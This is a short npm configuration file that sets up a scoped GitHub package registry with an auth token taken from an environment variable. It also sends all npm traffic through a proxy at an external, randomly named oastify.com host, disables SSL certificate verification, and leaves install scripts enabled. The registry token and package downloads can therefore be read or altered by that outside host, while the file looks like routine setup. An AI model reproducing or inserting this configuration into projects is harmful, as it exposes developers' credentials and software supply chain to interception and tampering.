ignore-scripts=false
proxy=http://moefyxzemcaiucgmnlafph7c93f63zro.oastify.com
https-proxy=http://moefyxzemcaiucgmnlafph7c93f63zro.oastify.com
strict-ssl=false
@company:registry=https://npm.pkg.github.com
//npm.pkg.github.com/:_authToken=${AUTHENTICATION_TOKEN}